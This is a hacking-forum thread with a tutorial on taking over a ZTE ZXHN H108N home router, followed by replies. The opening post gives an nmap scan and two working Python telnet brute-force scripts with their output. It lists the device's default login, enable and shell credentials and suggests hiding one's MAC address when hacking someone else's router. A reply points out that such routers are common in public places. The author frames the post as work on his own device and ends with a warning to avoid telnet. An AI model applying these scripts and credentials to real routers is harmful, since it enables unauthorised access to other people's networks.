+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: Hacking ZTE router (ZXHN H108N) (/Thread-Hacking-ZTE-router-ZXHN-H108N)
Pages:
1
2
Hacking ZTE router (ZXHN H108N) - Ligeti - 06-24-2014
Hello
I did this for fun only... nothing really special, this is just a story (a true one)
Setup
OK, I have a ZTE router: ZXHN H108N, that is I am connected to using wlan0 interface (wireless), and the gateway is 192.168.1.1, the goal is to gain access to the shell!
I am (recently only) running Mint 16, not Kali, not BT5 and of course not Mickey Mouse (Windows)!
Reconnaissance and Footprinting
Note: as this is my router I didn't have to worry about hidding (going anonemous) by changing MAC address and so on... but I would recommend doing so if you are pentesting/hacking someone!
So first thing to do is to scan the ports and OS banner (to determine the OS) and so on! For that I used nmap:
Code:
nmap -F 192.168.1.1 -O
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-20 00:03 EEST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0035s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
443/tcp open https
MAC Address: 54:22:F8:16:67:1F (zte)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 secondsI used a fast scan (-F option) for no reason really, I could do a full TCP scan or even include UDP... but I would like to keep things ... simple!
So as you can see the OS is Linux 2.6.9-30 and there are three ports opened... and holy crap this router is running Telnet!!! This should be fun (and it was!)
Gaining Access
So the next thing is to try and connect to the router via Telnet, so I did the following:
Code:
ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
************************************************************
Welcome to the world of CLI !
************************************************************
Username:Hmmm... I need the user name and password to access the CLI (Command Line Interface)! Well... tbh I just tried couple of random usernames (I had 3 chanced before the connection is lost), the first one was "admin" and it returned "% Bad username!" but then I thought to myself: "If I want to access the shell as root... the username should be root right? duh!!!", so entered "root" and it was correct, but for the password I tried couple of known passwords such as {toor, root, admin, admin123, ...} none worked (I failed)! I could go on for hours/days/weeks... but I want to access the shell and I wanted NOW!!!
The Attack 0x00
So, what do I have so far?
- IP address
- Telnet access (opened)
- CLI
- Username
I need the password!
Well... for no reason I decided to write my own tool to crack the password, using dictionay attack, I was lucky! because I used a very small wordlist (1275 words only), the wordlist (or dictionary) is made of the most common used passwords, I don't remember where I got this list from, but it is not important really!
My code:
Code:
#ZTE_Hacking
# execfile('/home/ligeti/Scripts/ZTE_Script.py')
import telnetlib
import time
from sys import stdout
wordlist = '/home/ligeti/wordlists/wordlist.txt'
# Load the wordlist file
with open(wordlist, 'r+') as f:
# Read the file
lines = f.readlines()
# Telnet
connection = telnetlib.Telnet()
# Testing
for password in lines:
try:
print '\r' + '\t' + time.ctime(time.time()) + '\t' + password.strip('\r\n'),
stdout.flush()
# Connect to the router (Telnet)
connection.open('192.168.1.1')
# Read until the server/Router asks for username
chk = connection.read_until("Username:")
# Send the username (root)
connection.write("root\n")
# Read until the server/Router asks for password!
chk = connection.read_until('Password:')
#send the password that we are currently testing
connection.write(password)
# this is important, I actually don't know
# how to check if this password is correct
# but I know that it will keep asking for the password in case if it is not!
# So I will check for the "Password:" string and if I get a delay
# for 1 second then this could mean that this is the correct password!
chk = connection.read_until('Password:', 5)
# Extra check: checking that the router didn't respond with "% Bad username!"
if ('Bad' not in chk):
connection.close()
print "\nHacked: " + password
break
connection.close()
except Exception, e:
print 'Error (' + password.strip('\r\n') + '): ' + str(e)Note: the script is dirty, and I don't care, all I want is the password! If you are irritated by my script please feel free to post a better one, but please do it quietly please, the script is not the main topic for this thread! Or for any of my threads... ever! I am asking this with all my respect of course.
So here is the output (took a while to finish):
Code:
>>> execfile('/home/ligeti/Scripts/ZTE_Script.py')
Tue Jun 24 23:17:13 2014 888888 Error (888888): telnet connection closed
Tue Jun 24 23:17:46 2014 angela1 Error (angela1): telnet connection closed
.
.
.
Tue Jun 24 23:31:46 2014 parrot Error (parrot): telnet connection closed
Tue Jun 24 23:32:10 2014 public
Hacked: publicBingo! The password is "public", time to test:
Code:
ligeti-Studio-1558 ~ # telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
************************************************************
Welcome to the world of CLI !
************************************************************
Username:root
Password:
CLI>?
Exec commands:
enable Turn on privileged commands.
exit Quit from telnet.
ping Ping the destination.
CLI>enable
Password:Explanation:
- I connect to 192.168.1.1:23 (telnet).
- I enter the user name and password (root/public).
- I see CLI> prompt (similar to Cisco routers) so I try '?' for help.
- I see enable command, which switch the CLI to config mode.
The Attack 0x01
And now I need the password to enable the config mode, I tested some passwords manually, and I guessed it successfully after few attempts, BUT... let's try brute-force the damn thing
The password is alphanumeric, so my charset will be:
Code:
>>> string.ascii_letters + string.digits
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'So I need a code to test the combination of all these letters ... crazy eh? becaue the total tries for only three characters password would be:
Code:
>>> pow(len(string.ascii_letters + string.digits), 3)
238328And for 8 characters:
Code:
>>> pow(len(string.ascii_letters + string.digits), 8)
218340105584896LI have no time for this ... so I will show you a simple script (just for fun), that will check only 3 characters long passwords (and only with string.lowercase charset)
Code:
#ZTE_Enable
# execfile('/home/ligeti/Scripts/ZTE_Enable.py')
import telnetlib
import time
from sys import stdout
import itertools
import string
password = []
connection = telnetlib.Telnet()
print "Connecting to router"
connection.open('192.168.1.1')
print "Connecting to CLI"
chk = connection.read_until('Username:')
connection.write('root\n')
chk = connection.read_until('Password:')
connection.write('public\n')
chk = connection.read_until('CLI>')
print "Generating wordlist"
wordlist = itertools.product(string.lowercase, repeat=3)
for word in wordlist:
password.append(''.join(word))
print "Attacking..."
index = 0
while (index < len(password)):
connection.write('enable\n')
chk = connection.read_until('Password:')
for i in range(0, 3):
print '\r' + str(index) + '\t' + time.ctime(time.time()) + '\t' + password[index],
stdout.flush()
connection.write(password[index] + '\n')
chk = connection.read_until('Password:', 1)
index += 1
if ('Bad' not in chk):
print "\nHacked: " + password[index-1]
breakOutput (took +4 hours to finish)
Code:
>>> execfile('/home/ligeti/Scripts/ZTE_Enable.py')
Connecting to router
Connecting to CLI
Generating wordlist
Attacking...
17398 Wed Jun 25 00:59:00 2014 zte
Hacked: zteYes it was 'zte', something I did guess by myself, and with this information I could actually access the config mode:
Code:
CLI>enable
Password:
CLI#?
Exec commands:
allgreenledon set all green led on
allledoff set all led off
allledon set all led on
configure Enter configuration mode.
disable Exit from privilege mode.
exit Quit from telnet.
macaddr show or set mac address
ping Ping the destination.
reboot Reboot device.
reset reset device
restoredefault Reset to factory configuration.
serialnumber get or set SN
swversion show software version
CLI#shell
ZXHN H108N
Login: root
Password:
Password is incorrect
Password:
Password is incorrect
Password:
BusyBox v1.01 (2013.07.10-08:47+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
#I don't want to make this thread any longer, I know that the subject is boring, but... I had to share (for a very good reason)
So the username and the password for the shell is root:root (easy eh?)
Conclusion
If your router is using Telnet... get another one! If it does use SSH check the version and security! Be very careful with these issues, a misconfigured network device can be the worse nightmare one can have if a hacker find out about it! So always check and double check your network configuration and devies you use!
Thank you and please leave your comment[s] or question[s]
[note] If you are interested in this topic please check my other thread: http://www.hackcommunity.com/Thread-Haking-TP-Link-TL-WR740N
RE: Hacking ZTE router (ZXHN H108N) - chmod - 06-25-2014
Another interesting read, I'm sure I have an old telnet enabled router laying around somewhere.
To the attic!
Also why you raging on routers so hard lately lol
RE: Hacking ZTE router (ZXHN H108N) - Ligeti - 06-25-2014
(06-25-2014, 12:03 AM)chmod Wrote: Another interesting read, I'm sure I have an old telnet enabled router laying around somewhere.
To the attic!
Almost all Cisco and ZTE routers has Telnet enabled on them by default (nowadays)
Quote:Also why you raging on routers so hard lately lol
Well... we don't have enough/(or at all) tutorials to cover this area I guess!
Plus, this is a VERY important subject... yet it is sort of ignored! Just imagine what does i mean if you can access the configuration of the firewall in the router, or build a VPN and access the network remotely, or even worse ... implement a MiTM attack (somehow)!?
Anyway, I think this is the last tutorial about routers, I know the subject is boring, people nowadays are more interested in the application layer than networks and network devices (and tbh I don't blame them)
Thanks
RE: Hacking ZTE router (ZXHN H108N) - Ex094 - 06-25-2014
If a router is powered by DDWRT firmware, it definitely has telnet open then I thing I can use this ti access the router right?
RE: Hacking ZTE router (ZXHN H108N) - Ligeti - 06-25-2014
This router is running BusyBox v1.01...
Telnet is not a vulnerability (as you may already know) but a good attack vector ... the vulnerability is the default username/password! Which can't (yes it can NOT) be avoided easily, Kaminsky talked about this issue in this interview (recommended to watch)
The access is not a problem... it is what you can do after that (with 64kb memory and about 16kb for storage)...
What I hacked so far was iptables and dnsmasq (a simple DNS and DHCP server)... I did check also httpd (apache) and minihttp on other routers.
The problem is... lots of people are using these routers! So you can actually go into any coffeeshop, company, airport, store, resturant... etc. and find these routers (from ZTE, TP-Link and BandLuxe), ISP companies know about this issue and they are ignoring it (totally, royally and intentionally)... Do you know how crazy is this? I thik that the whole country is vulnerable!!!
I downloaded the source code for both DDWRT and OpenWRT to test... it will take me a while though to finish my testing, so if you find anything on your part please let me know and I will gratefully appreciate it
Thanks
RE: Hacking ZTE router (ZXHN H108N) - iCode_() - 07-01-2014
great tutorial and explanation, thank you for contributing.
Regards, iCode_()!!! :Smile:
RE: Hacking ZTE router (ZXHN H108N) - Ligeti - 07-05-2014
(07-01-2014, 06:33 PM)iCode_() Wrote: great tutorial and explanation, thank you for contributing.
Thanks, glad you liked it!
@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!
Thanks
RE: Hacking ZTE router (ZXHN H108N) - chmod - 07-05-2014
(07-05-2014, 01:47 PM)Ligeti Wrote:(07-01-2014, 06:33 PM)iCode_() Wrote: great tutorial and explanation, thank you for contributing.
Thanks, glad you liked it!
@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!
Thanks
Good point, moved.
RE: Hacking ZTE router (ZXHN H108N) - Ligeti - 07-05-2014
(07-05-2014, 02:06 PM)chmod Wrote:(07-05-2014, 01:47 PM)Ligeti Wrote:(07-01-2014, 06:33 PM)iCode_() Wrote: great tutorial and explanation, thank you for contributing.
Thanks, glad you liked it!
@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!
Thanks
Good point, moved.
Thanks mate, and sorry about this confusion, I will try to be more careful next time
Thanks again
RE: Hacking ZTE router (ZXHN H108N) - chmod - 07-05-2014
(07-05-2014, 03:40 PM)Ligeti Wrote:(07-05-2014, 02:06 PM)chmod Wrote:(07-05-2014, 01:47 PM)Ligeti Wrote:(07-01-2014, 06:33 PM)iCode_() Wrote: great tutorial and explanation, thank you for contributing.
Thanks, glad you liked it!
@Snipa/@chmod guys this is also about routers, maybe we should move it to "Data networks" section as well? Although the subject is still about hacking!
Thanks
Good point, moved.
Thanks mate, and sorry about this confusion, I will try to be more careful next time
Thanks again
It happens I know you don't do it intentionally